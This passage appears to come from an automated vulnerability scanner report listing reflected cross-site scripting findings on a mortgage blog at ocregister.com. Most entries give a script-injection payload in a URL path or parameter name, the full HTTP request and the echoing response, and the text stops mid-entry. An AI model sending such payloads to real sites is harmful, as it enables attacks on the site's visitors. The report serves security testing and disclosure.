GET /2009/121391f"><script>alert(1)</script>20503540395/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:13:04 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:13:04 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/121391f\"><script>alert(1)</script>20503540395/feed/" /> ...[SNIP]...
1.317. http://mortgage.ocregister.com/2009/12/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2009/12/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7488"><script>alert(1)</script>f79a6b90c3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c7488\"><script>alert(1)</script>f79a6b90c3f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/12/?c7488"><script>alert(1)</script>f79a6b90c3f=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:12:55 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 96657
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2009 December - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/12/?c7488\"><script>alert(1)</script>f79a6b90c3f=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 935fb"><script>alert(1)</script>77d498ba61a was submitted in the REST URL parameter 1. This input was echoed as 935fb\"><script>alert(1)</script>77d498ba61a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010935fb"><script>alert(1)</script>77d498ba61a/01/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:12:52 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:12:52 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010935fb\"><script>alert(1)</script>77d498ba61a/01/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9d7d"><script>alert(1)</script>ca8ccf11586 was submitted in the REST URL parameter 2. This input was echoed as d9d7d\"><script>alert(1)</script>ca8ccf11586 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/01d9d7d"><script>alert(1)</script>ca8ccf11586/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:12:55 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:12:55 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62653
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/01d9d7d\"><script>alert(1)</script>ca8ccf11586/feed/" /> ...[SNIP]...
1.320. http://mortgage.ocregister.com/2010/01/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2010/01/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fc50"><script>alert(1)</script>ec9310bc127 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6fc50\"><script>alert(1)</script>ec9310bc127 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/01/?6fc50"><script>alert(1)</script>ec9310bc127=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:12:47 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 106635
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2010 January - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/01/?6fc50\"><script>alert(1)</script>ec9310bc127=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 712e3"><script>alert(1)</script>9e5b2bfe9ed was submitted in the REST URL parameter 1. This input was echoed as 712e3\"><script>alert(1)</script>9e5b2bfe9ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010712e3"><script>alert(1)</script>9e5b2bfe9ed/02/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:12:54 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:12:55 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62653
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010712e3\"><script>alert(1)</script>9e5b2bfe9ed/02/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b385"><script>alert(1)</script>122a8b5d193 was submitted in the REST URL parameter 2. This input was echoed as 7b385\"><script>alert(1)</script>122a8b5d193 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/027b385"><script>alert(1)</script>122a8b5d193/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:12:58 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:12:59 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/027b385\"><script>alert(1)</script>122a8b5d193/feed/" /> ...[SNIP]...
1.323. http://mortgage.ocregister.com/2010/02/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2010/02/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6efb2"><script>alert(1)</script>1b95ace2821 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6efb2\"><script>alert(1)</script>1b95ace2821 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/02/?6efb2"><script>alert(1)</script>1b95ace2821=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:12:47 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 96136
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2010 February - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/02/?6efb2\"><script>alert(1)</script>1b95ace2821=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2292"><script>alert(1)</script>bcdb1fec87 was submitted in the REST URL parameter 1. This input was echoed as f2292\"><script>alert(1)</script>bcdb1fec87 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010f2292"><script>alert(1)</script>bcdb1fec87/03/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:12:52 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:12:53 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62653
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010f2292\"><script>alert(1)</script>bcdb1fec87/03/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 310bd"><script>alert(1)</script>7a47a846288 was submitted in the REST URL parameter 2. This input was echoed as 310bd\"><script>alert(1)</script>7a47a846288 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/03310bd"><script>alert(1)</script>7a47a846288/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:12:56 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:12:57 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/03310bd\"><script>alert(1)</script>7a47a846288/feed/" /> ...[SNIP]...
1.326. http://mortgage.ocregister.com/2010/03/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2010/03/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6768b"><script>alert(1)</script>54bb9743afd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6768b\"><script>alert(1)</script>54bb9743afd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/03/?6768b"><script>alert(1)</script>54bb9743afd=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:12:39 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 96876
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2010 March - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/03/?6768b\"><script>alert(1)</script>54bb9743afd=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ca09"><script>alert(1)</script>d2b6ccdfeec was submitted in the REST URL parameter 1. This input was echoed as 4ca09\"><script>alert(1)</script>d2b6ccdfeec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20104ca09"><script>alert(1)</script>d2b6ccdfeec/04/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:12:42 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:12:43 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20104ca09\"><script>alert(1)</script>d2b6ccdfeec/04/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e7ae"><script>alert(1)</script>1e9af29e281 was submitted in the REST URL parameter 2. This input was echoed as 2e7ae\"><script>alert(1)</script>1e9af29e281 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/042e7ae"><script>alert(1)</script>1e9af29e281/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:12:47 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:12:47 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/042e7ae\"><script>alert(1)</script>1e9af29e281/feed/" /> ...[SNIP]...
1.329. http://mortgage.ocregister.com/2010/04/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2010/04/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 554c6"><script>alert(1)</script>0a80980ac2b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 554c6\"><script>alert(1)</script>0a80980ac2b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/04/?554c6"><script>alert(1)</script>0a80980ac2b=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:12:39 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 96995
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2010 April - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/04/?554c6\"><script>alert(1)</script>0a80980ac2b=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7b94"><script>alert(1)</script>a62b666be76 was submitted in the REST URL parameter 1. This input was echoed as e7b94\"><script>alert(1)</script>a62b666be76 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010e7b94"><script>alert(1)</script>a62b666be76/05/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:12:39 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:12:40 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010e7b94\"><script>alert(1)</script>a62b666be76/05/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bedbd"><script>alert(1)</script>11ff887daaf was submitted in the REST URL parameter 2. This input was echoed as bedbd\"><script>alert(1)</script>11ff887daaf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
